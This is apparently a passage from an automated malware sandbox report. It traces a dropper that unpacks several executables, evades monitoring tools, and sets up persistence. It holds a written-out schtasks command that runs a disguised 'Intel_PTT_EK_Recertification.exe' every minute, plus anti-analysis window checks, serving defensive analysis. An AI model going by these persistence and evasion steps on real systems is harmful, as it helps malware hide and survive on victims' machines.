                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F7B6E push ebx; mov dword ptr [esp], ecx0_2_008F7DA5
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F7B6E push 5DDA75A3h; mov dword ptr [esp], ebx0_2_008F7E41
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F7B6E push ebp; mov dword ptr [esp], 4FAF3BEEh0_2_008F7ED0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00B8D91C push ecx; ret 1_2_00B8D92F
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B8D91C push ecx; ret 2_2_00B8D92F
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B8D91C push ecx; ret 6_2_00B8D92F
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BADEDB push ss; iretd 6_2_00BADEDC
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B8DFC6 push ecx; ret 6_2_00B8DFD9
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D114C8 push esi; iretd 7_2_04D114CA
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D13554 push 685C04CFh; iretd 7_2_04D1355A
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D12658 pushad ; iretd 7_2_04D1265A
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D1265B pushad ; iretd 7_2_04D1265E
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D1265F pushad ; iretd 7_2_04D12662
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D1367C push 691804CFh; iretd 7_2_04D13682
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D12773 pushad ; iretd 7_2_04D1277A
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D11088 push ebx; iretd 7_2_04D1109A
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F03374 push 69C84589h; ret 7_2_09F03379
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F0331B push 69C84589h; ret 7_2_09F03320
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F0B2D0 push ebp; ret 7_2_09F0B2DE
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F0AD28 push esp; ret 7_2_09F0AD36
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F0ACE9 push ebp; ret 7_2_09F0ACF6
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F037BE push 69C84589h; ret 7_2_09F037C3
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F0AF19 push ebp; ret 7_2_09F0AF26
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09F07613 push ebx; retf 7_2_09F0762A
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 9_2_031D5946 push ss; retf 9_2_031D594F
                              Source: file.exeStatic PE information: section name: entropy: 7.987026021929319
                              Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.987026021929319
                              Source: zudFSfy[1].exe.6.drStatic PE information: section name: .text entropy: 7.73440914387992
                              Source: zudFSfy.exe.6.drStatic PE information: section name: .text entropy: 7.73440914387992
                              Source: kz8ZdyP[1].exe.6.drStatic PE information: section name: .text entropy: 7.728302109295055
                              Source: kz8ZdyP.exe.6.drStatic PE information: section name: .text entropy: 7.728302109295055
                              Source: random[1].exe1.6.drStatic PE information: section name: entropy: 7.97763924592368
                              Source: random[1].exe1.6.drStatic PE information: section name: alcvhdaz entropy: 7.952386311875822
                              Source: ac68c6b737.exe.6.drStatic PE information: section name: entropy: 7.97763924592368
                              Source: ac68c6b737.exe.6.drStatic PE information: section name: alcvhdaz entropy: 7.952386311875822
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, KkPfaNtwV41t8IJvdeT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kRgN7rZEXo', 'vY6NRxgqje', 'hVKNa58P3j', 'WYyNfUrVEq', 'SFaNi701yW', 'GVuNjdS8FL', 'YtvNxEUUaW'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, HnGPflfHNmJS7oVQ3y.csHigh entropy of concatenated method names: 'hP2nCdqmoq', 'AFKnRYJuLn', 'vsvnfo3GEi', 'hU3ni5dvpu', 'DRenqf2XL4', 'Y5ynKFF4BA', 'RdxnBKejmw', 'sxNnHKSbbE', 'CbHnefHxtx', 'ddZndaDYFi'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, E1VgkvzlaUUe5I7EnV.csHigh entropy of concatenated method names: 'kOQNT5lSYk', 'q09NyiAnZC', 'LgUNZ5WmSL', 'uFrNl76ihC', 'XDRNqrdYF2', 'lfsNBD8U6k', 'kSYNHOVUmD', 'dojNsoZemT', 'tWBNFF8GPD', 'RslNPWkaNU'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, uM81CQkLcVsJBunMLq.csHigh entropy of concatenated method names: 'LMPY5jZ8hA', 'gcCYJI93VE', 'xbn4wfV97A', 'djP4tN06E0', 'IgcY7S244G', 'Y6eYRwfm2o', 'PrrYaMWSvp', 'elkYfOB0ZN', 'VoKYiMCXRu', 'KpYYjRnruC'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, aDjnAZduavW1X70xIc.csHigh entropy of concatenated method names: 'rt8DAVlUr3', 'KCXD8sT3MC', 'In1DEaCdh3', 'T3uEJsyYke', 'KqPEzrhh1A', 'YsXDwj22je', 'MWjDtWZMs8', 'dXWDgpMaMm', 'UUMDLL3Uab', 'XShD6Z6tc4'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, YSmDmSUIb6XTKqNKfJ.csHigh entropy of concatenated method names: 'eAKpMUC3Dn', 'rRrpIare1b', 'JIq8K9FCWB', 'CyY8BJBc3q', 'hW58HjWXal', 'mAt8eJ6Q9u', 'v688d1ILtU', 'XJ18WU0iCu', 'RQk8cqGFIY', 'oQS8CckGLx'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, N1MYrP94QEPot2L65P.csHigh entropy of concatenated method names: 'oUHhnlvJme', 'VHnhYRnCE2', 'rqJhhjNc8O', 'NDYhX6GqIQ', 'flnhrnehMC', 'UIthsUEdpJ', 'Dispose', 'dPL4AX55gM', 'aEn4vHEpAQ', 'NBy48RsVQY'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, dExnHFt6wLa0mOWwdBQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Y2Vmh1YYBv', 'XuJmNdHu6B', 'x7EmXniD2o', 'rO6mm5DtYy', 'PjdmrI8LJ0', 's4jmbKycDG', 'C1Smse59bZ'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, lMspwXGJ7GGwaQ4tEX.csHigh entropy of concatenated method names: 'hEwhlvhlY7', 'LhwhqkLv6s', 'VQ0hKEDqrh', 'n5vhB8pYCi', 'weFhHIwS1n', 'I5Ihexv6TT', 'FXqhdyk1pe', 'YbrhW7uLoL', 'DLihcEJdpt', 'uoohCWvE1H'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, FAZsSmq64bjJSy6XNC.csHigh entropy of concatenated method names: 'WEqQ140LGF429pjfGJL', 'u0maot0irw6EgIuSEUu', 'CpSE4Kq6cT', 'PpiEh87CDX', 'wdfENK7Y9k', 'Vhsfw10oUOpyocbL3Bw', 'CqjWLX0AasagovgkldZ'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, XYnGdNJEdTTKvHfm3Z.csHigh entropy of concatenated method names: 'cIDN8ubs5q', 'TvgNpHbQ67', 'auPNEc6luH', 'GZ1NDkWugj', 'BSwNhCtxhQ', 'tnLNuP5cm2', 'Next', 'Next', 'Next', 'NextBytes'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, QJMEIAttci1YmKS0t4s.csHigh entropy of concatenated method names: 'TpENJD1rKN', 'A52NzPQ45b', 'bRFXwPElQq', 'wskXt6ypuu', 'jT7XgaLPis', 'xJ4XLdvGAs', 'fejX6u0XOS', 'fwLXSCJKYT', 'qV1XA2rWUW', 'ttPXvsiCNj'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, ziQ2hkapDy9nXIwQWr.csHigh entropy of concatenated method names: 'yrYQyD8mXe', 'u6cQZfZum3', 'c4BQluo8FH', 'iU3QqrFVNW', 'awWQBPWn33', 'ExNQHac1Cg', 'rYbQdpeaYR', 'bPPQWq4bFP', 's5xQC8nnU8', 'a9xQ7cEMjk'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, Kt4aMclhtREMnIB4nh.csHigh entropy of concatenated method names: 'qakESekDkA', 'KqqEv94CA8', 'drbEp7Qki4', 'xbtEDFuolZ', 'CT7EuwaYmu', 'nKBp1vaD3N', 'G72pkVrwx8', 'q9hp9ujB6g', 'Mepp5pmTh8', 'PuTpGdxE9Z'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, bFtFusgXEbLd1sfmBX.csHigh entropy of concatenated method names: 'ndVVShDRw', 'qZZ3KKtaL', 'X2QTBlOWm', 'mLXIUYGhO', 'DIUZ3NY9w', 'a5qUxEEo3', 'xA8bHnM9tf6yJpsC4C', 'tnDoQBjoojnCstZQXc', 'P5v4TSTyh', 'ukxNn3BDT'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, yUAvZA6YV6jmTkDsfi.csHigh entropy of concatenated method names: 'XMBtDHOLEv', 'mT7tuQhOrs', 'fKUt22UXfL', 'Nq7t0RJSmD', 'GNKtnfJdt4', 'QMctohtREM', 'kS6pFvEahQcm3P4igY', 'ziDQRLteB2I1tQnnIQ', 'OXBttpKc30', 'kajtLZMhQB'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, kW9HmCxyetpQAMuVTh.csHigh entropy of concatenated method names: 'B4EY2HTA96', 'tjLY0cL2oW', 'ToString', 'SL4YAxcWwJ', 'm4LYvqbAov', 'da0Y86o3co', 'eBoYpaPGfO', 'u9OYExBCLU', 'XLZYDfA5Zv', 'FNWYuiAGP9'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, h4sA0M8cttu3AytW4c.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wZugGmaL8i', 'ha8gJA1RWm', 'V4MgzaOvO1', 'BP2LwNctoJ', 'b2OLt8fklN', 'v8KLgnAYIR', 'CoaLL4pSjq', 'rhkvKsOqB4AoFwpNVuE'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, jlRAYdtgdxajSA6E8R8.csHigh entropy of concatenated method names: 'ToString', 'HJOXyatoQc', 'HbrXZN39uU', 'f9lXUD04Q0', 'h0EXlLpsnC', 'U0VXq7VWZ8', 'vA0XKVxR97', 'RmwXBo7iEF', 'X9cjWC4ERJXLKpchTEI', 'b6s36i4tdB4eINPNVuv'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, Vg8SFAZKU2UXfLCq7R.csHigh entropy of concatenated method names: 'FaF83g5fqh', 'HCh8TdkOGl', 'h218yq9Hx1', 'qSf8ZYs5Rj', 'y5O8nk5Gab', 'OEJ8omaiWo', 'kuI8Yne6ML', 'rxE84qPFgo', 'iWa8hOoeHR', 'W1Z8NMIFqu'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, mktlYdcWP30buDWU1j.csHigh entropy of concatenated method names: 'i4cDFNeWDj', 'q18DPfh7OM', 'RSLDVMSq0l', 'sEHD391MZV', 'tp6DMMHeJx', 'KHjDTXaYZu', 'fOdDIiHR4P', 'Y1kDyV7ttr', 'LmCDZKJOGy', 'V9SDUikGuS'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, kVdiZvv5P10CtuHo1D.csHigh entropy of concatenated method names: 'Dispose', 'iPotGt2L65', 'J8ngqOtylN', 'zH0DLI3w8a', 'yDrtJBfP4Q', 'Khhtz4QRe4', 'ProcessDialogKey', 'krOgwMspwX', 'Y7GgtGwaQ4', 'bEXggGYnGd'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, p70yJbu5bF4vKhUO1a.csHigh entropy of concatenated method names: 'XR7LSXCnhI', 'k5LLApS7HO', 'D54LvXvPbY', 'CDZL82WCng', 'LaNLpus8uU', 'q5rLEyYh8n', 'TXULDqLrnl', 'RF5LukqDTl', 'iifLOaksHF', 'EbrL2A4nir'
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, IHOLEvy0T7QhOrsMmC.csHigh entropy of concatenated method names: 'U3nvfX1V1H', 'HmYviIvu6Q', 'AKRvjubO1u', 'F8evxEdJFk', 'JDJv11Bqvn', 'PmKvkNJ071', 'KlGv9VILIB', 'L67v5pysNH', 'vlRvGOFpyb', 'etWvJdsqte'

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017355001\96ae609d19.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kz8ZdyP[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zudFSfy[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeFile created: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
